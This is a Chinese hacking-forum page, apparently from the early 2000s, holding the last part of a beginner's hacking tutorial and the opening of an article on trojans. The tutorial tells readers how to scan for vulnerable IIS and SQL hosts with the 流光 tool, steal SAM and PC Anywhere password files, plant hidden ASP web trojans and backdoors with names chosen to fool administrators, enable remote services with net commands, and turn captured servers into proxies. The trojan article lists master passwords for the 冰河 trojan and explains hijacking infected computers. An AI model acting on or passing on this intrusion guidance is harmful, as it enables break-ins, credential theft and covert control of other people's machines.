settings下的开始菜单下的启动,知道了吧,至于要顺利放进去的话,会遇到空格长名等等问题,就看你的基本功了。win.ini里有load,加进去。还有便是注册表,好好研究一下regedit.6,本地溢出。这个比较高深,我能告诉大家的只是,去四处找找本地溢出程序。总的来说,unicode改主页是非常简单的,但是若是要取得更高的权限,就要一番努力,上面的方法只是些思路,实际想跳楼作时需要具体处理,开动脑筋,把方法都结合起来。(是不是听起来有点玄?)想想好像没有什么其他的途径要说了,什么?linux,呵呵,我还不大懂,就不在这里瞎说了。那今天就说到这里了,6里面我会说说后门制作,小问题和我的一点经验。期待吧!这是最后一节了,写的傻傻的,但我毕竟坚持下来了,值得鼓励!(偶尔阿q一下)在写菜鸟想跳楼的同时,我们的cshu(cshu.51.net)也在默默成长,但现在我要准备离开了,真是有点舍不得。在今后的日子里,还请大家多多支持cshu和christ,freedom他们。今天说点什么呢?没有主题,乱谈一通吧!首先我要吐一次血,当然是为了推荐一样东西,就是流光!(那么没创意,老土!)不管怎么说,小榕的流光应该是中国第一黑软,他综合了诸多的攻击手段,使攻击便捷化,当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。我来说说我自己觉得最有用的几个项目:1,探测----扫描pop3/ftp/nt/sql主机,要是无目的地黑,那么用这个再合适不过了。进去后填好ip范围(范围可以扫大一点,它很快的),至于类型嘛,要是你要一大堆unicode,那么选择iis/frontpage再合适不过了,要是要更高的权限,sql是不错的选择。完成后,表格里会多出一大堆东西。remote execute-x 这是几种不同的unicode,用它比用ie来执行方便多了,但是echo有问题(是我自己不会,会的朋友快教我)remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件,要使用的话,你首先要有一个ftp账号,去申请吧!顺利拿到cif文件后,用流光自带的工具就可以解开密码,很爽的!remote ftp sam -x 拿sam的,还是用最好的lc3来解吧!frontpage extended 这是frontpage扩展,不过不要高兴,是要密码的。但是若是后面跟了privilege hole的话,放声大笑吧!(小心不要让邻居拿着菜刀冲进来)打开frontpage,打开站点, http://ip就可以了!(http://不要忘)此外还有一点变通,大家肯定读的懂的。2,探测----高级扫描工具。这可是流光4中的重头戏,综合了很多漏洞,还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测,很快扫出漏洞后,流光会生成一个报告文件,其中包含漏洞的连接,要是你看不懂的话,建议你拿出x-scan,里面有漏洞描述的。3,工具----nt管道远程命令,种植者,这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号,相信在此之前你应该有几个了吧,那就快点试试吧!总的来说,流光的使用是非常简单的,其中也有不少工具值得我们一用,tools目录里有一些很好的工具,exploit里则有很多溢出攻击程序,前提是你应该会c,不会的话我也没办法,学会c起码要看10倍于菜鸟想跳楼的资料吧!另外给大家推荐一个站点:,有什么漏洞的话就去那里找找,你会有所收获的。然后我想说说一些黑站的经验。☆当我们用unicode控制一台机器时,我向大家推荐用asp木马,阿新的改良版,本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息,最好也放一个cmd.asp上去,运气好的话,可以运行命令的。上传好后,ie里输入其中index.asp的地址,呵呵,我们就能方便地管理其中的文件了,可以改网页,改代码,上传脚本文件麻烦?那就用它来生成吧!推荐他的最大原因便是----便于隐藏!一般网站总有一个庞大的目录,选择一个深的,放进去,网管很难发现的:)最后对大家说一句,要是有备份目录(很多网站都有的),最好也放一份进去。有一次我用这个东西修改一家网站的首页,改了两三次网管也没删掉,可是突然一天不行了,原来他用了备份的网页(还算机灵吧)☆我想对大家说,对于国内网站,最好不要恶意去攻击,因为我们是中国人嘛!在5/1期间,我发现有一些国内站点被黑,留下的页面上不是poison box,而是中国人的话,这真是无耻到了极点!!!!大家千万不要学哦。还有,现在网上有很多还没有网页的主机,往往有很多漏洞,对于这种机器,竟有一些小人也会去改收页(比如上海那个姓杨的小子)这算什么?显示实力,炫耀技术?呵呵,见鬼去吧!我的建议是,不要改它的首页,而是努力去拿admin,控制它,这样我们有很多选择:肉鸡,等它有正式主页后可以黑,或者把我们的主页放上去!比申请好多了,权限又足!当然很危险:)这样做是不是有品位多了?☆要是我们拿到了admin,但有时却不能执行一些命令,那很可能是因为服务启动的问题。试着用以下命令:net start termservice 启动win2k的终端控制net start workstation 打开net use 功能net start lanmanserver 打开ipcnet start eventlog 启动日志(你不会那么傻吧!stop)net start schedule 打开计划(at)net start server 共享还有很多,net命令里去找吧!☆打开telnet1,远程去运行ntlm.exe,流光里有2,net stop telnet3, net start telnet☆我推荐几种后门:winshell(默认端口5277)相对于srv,它好一些。remotenc这个是榕哥的作品,可以以指定用户执行,还可以自己起服务的名字,很棒的!至于服务的名字,建议大家去看看win2k的进程名,学着起相类似的名字,要做到使网管看到了也不会引起警觉,或是有警觉也不敢去删,呵呵,这样就最好了!☆代理问题。我推荐大家自己去做代理,控制了一台机器后,用snake前辈写的skserver去做个sock5。具体做法就不详细说了,因为比较普通,只要熟悉一下用法就可以了。做好了sock5,我们可以上oicq,下棋都用它,sock5代理可是很少见的哦!要是实在拿不到sock5,用http也可以,这里推荐一个软件tcp2http,它具有很多功能。在给个站点:国内最最好的的代理站点,怕死的朋友千万不要错过。最后说说一些对于菜鸟同志的建议:不要把黑当作一种显示自己的行为,要是你想耍威风,用url欺骗来骗mm最合适了,还可以弄个yahoo什么的……不要在一项技术上停留过长时间,当你熟练掌握后,应该迅速学习下一个新技术。不要和被你黑的网管过多接触,前车之鉴哦。对于一台好机器要做好后门,不要轻易失去它。想好好学黑客的话,就常去各大论坛转转,仔细读教程,忘记聊天室和网络游戏吧!实践是最好的教程,再次重申!应该多学计算机的其他方面的知识,任何知识在一定场合都是有用的。编程技术……好像太难了,不过再难也要学。想不出来了………………好了,我们的菜鸟想跳楼终于结束了,我这个大菜鸟也可以退休了,拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站,不知道大家是否成功了,不管这么样,我们都该不断的努力学习,不是吗?
在线时间小时
电魂*威望*好评0信誉2爱心76
黑客常用兵器之木马篇(上)“我知道远程控制是种武器,在十八般兵器中名列第七,木马呢?”  “木马也是种武器,也是远程控制。”  “既然是远程控制,为什么要叫做木马?”  “因为这个远程控制,无论控制了什么都会造成离别。如果它钩住你的E-Mail,你的E-Mail就要和你离别;如果它钩住你的QQ,你的QQ就要和你离别。”  “如果它钩住我的机器,我就和整个网络离别了?”  “是的。”  “你为什么要用如此残酷的武器?”  “因为我不愿被人强迫与我所爱的人离别。”  “我明白你的意思了。”  “你真的明白?”  “你用木马,只不过为了要相聚。”  “是的。”  一  在众多的黑客武器中特洛伊木马(Trojan horse)这种攻击性武器无论是菜鸟级的黑客爱好,还时研究网络安全的高手,都视为最爱。虽然有的时候高手将木马视为卑鄙的手段。但是作为最为有效的攻击工具,木马的威力要比其他的黑客工具大得多。  “木马既然如此有效,为何在Hacker兵器谱中排名靠后?”  “因为使用木马往往不是很光明正大。”  “哦?为何?”  “在使用木马的人群中菜鸟黑客居多,他们往往接触网络不久,对黑客技术很感兴趣,很想向众人和朋友显示一番,但是去驾驭技术不高,不能采取别的方法攻击。于是木马这种半自动的傻瓜式且非常有效的攻击软件成为了他们的最爱。而且随着国产化的木马不断的出现,多数黑客的入门攻击几乎无一例外都是使用木马。当然对于那些黑客老手来说他们也并不是不使用木马了,他们通常会在得到一个服务器权限的时候植入自己编写的木马,以便将来随时方便进出这台服务器。”  “但如此一来木马的名声不就随之降低了吗?”  “是的,所以现在的黑客高手都耻于用木马,更耻于黑个人的计算机。”  “不过木马在很多人的眼中仍然是一等一的绝好兵器。”在众多的木马之中Cult of Dead Cow开发的Back Orific2000应该算是名气比较大的一个。这款软件是在Back Orific2.1的基础之上开发的,但是他最大的改动就是增加了对Windows NT服务器系列的支持。作为微软的高端产品,BO2000的这个功能无疑对Windows NT来说是致命的,就Windows NT本身而言,由于硬盘采取了NTSF的加密,普通的木马,包括冰河也无法控制,当然要想要让多数木马无法对Windows NT发挥作用最好将Windows NT转化为NTSF的格式下才会比较好用一些。  而正因为如此BO2000才深得黑客高手的喜爱,因为他们感兴趣的也只有服务器,也只有Web Server才能够提起他们的胃口,那是一种来自深层感官的刺激。  通常情况下木马大致可分为两个部分:服务器端程序和客户端程序。服务器端通常就是被控制端,也是我们传统概念上的木马了。  二  “你说BO2000好,但是绝大多数的杀毒招数都能够沟将其制服,而且我感觉他在使用上不如我手里的冰河锐利,况且我也不想黑什么服务器。我认为,个人电脑中隐藏有更大的宝藏,而且个人电脑脆弱的我能够利用任何一种方法摧毁它。  “你说的很对,冰河确实锐利,而且称霸中华江湖一年之久,也可谓武林中少见的好兵刃,但是兵器虽然锋利,但兵器在打造的时候却留下来一个致命的缺点,这也是木马冰河为何在武林衰败的原因。”  “这是一个什么样的弱点那?竟然如此致命?”  “呵呵,说白了也很简单,冰河的作者在打造冰河2.X版本时就给它留下了一个后门,这个后门其实就是一个万能密码,只要拥有此密码,即便你中的冰河加了密码保护,到时候仍然行同虚设。”  “什么!真有此事?想我许多朋友还因为冰河好用把它当作了一个免费的远程控制程序来用,如此这般,他们的机子岂不暴露无遗?”  “呵呵,在黑客中瞒天过海、借花献佛这些阴险的招数都不算什么,多数木马软件的作者为了扩大自己的势力范围和争取主动权都会留一手,致命的一招。冰河的作者当然也不例外,而且由于作者钟爱许美静,所以每一个冰河中都包含许美静的歌词。当然作者为自己以后行事方便也留了几个万能密码。”  “噢?万能密码?”  “通常黑客在植入冰河这种木马的时候,为了维护自己的领地通常的要为自己的猎物加一个密码,只有输入正确的密码你才能够正常的控制对方的计算机,但是冰河的打造者为了方便自己的使用在冰河中加入了一个万能的密码,就像万能钥匙一样。冰河各版本的通用密码:  2.2版:Can you speak Chinese?  2.2版:  3.0版:yzkzero!  4.0版:  3.0版:yzkzero.51.net  3.0版:yzkzero!  3.1-netbug版密码: 123456!@  2.2杀手专版:  2.2杀手专版:dzq20000!你可以试试看,是不是很轻松的就能够进入任何一台有冰河服务器端的电脑?”  “真的进入了,果然有此事情,怪不得现在很多人都不再使用冰河。”  “此外冰河还存在着两个严重的漏洞:  漏洞一:不需要密码远程运行本地文件漏洞。  具体的想跳楼作方法如下:我们选择使用相应的冰河客户端,2.2版以上服务端用2.2版客户端,1.2版服务端需要使用1.2版客户端控制。打开客户端程序G_Client,进入文件管理器,展开“我的电脑”选中任一个本地文件按右键弹出选择菜单,选择“远程打开”这时会报告口令错误,但是文件一样能上传并运行。  任何人都可以利用这个漏洞上传一个冰河服务端就可以轻松获得机器的生死权限了,如果你高兴的话,还可以上传病毒和其它的木马。  漏洞二:不需要密码就能用发送信息命令发送信息,不是用冰河信使,而是用控制类命令的发发送信息命令。”  “当然这的确是一个原因,但更主要的是现在的多数杀毒软件都能克制冰河。”  三  木马通常会在三个地方做手脚:注册表、win.ini、system.ini。这三个文件都是电脑启动的时候需要加载到系统的重要文件,绝大部分木马使用这三种方式进行随机启动。当然也有利用捆绑软件方式启动的木马,木马phAse 1.0版本和NetBus 1.53版本就可以以捆绑方式装到目标电脑上,可

我要回帖

更多关于 远程攻击 的文章

 

随机推荐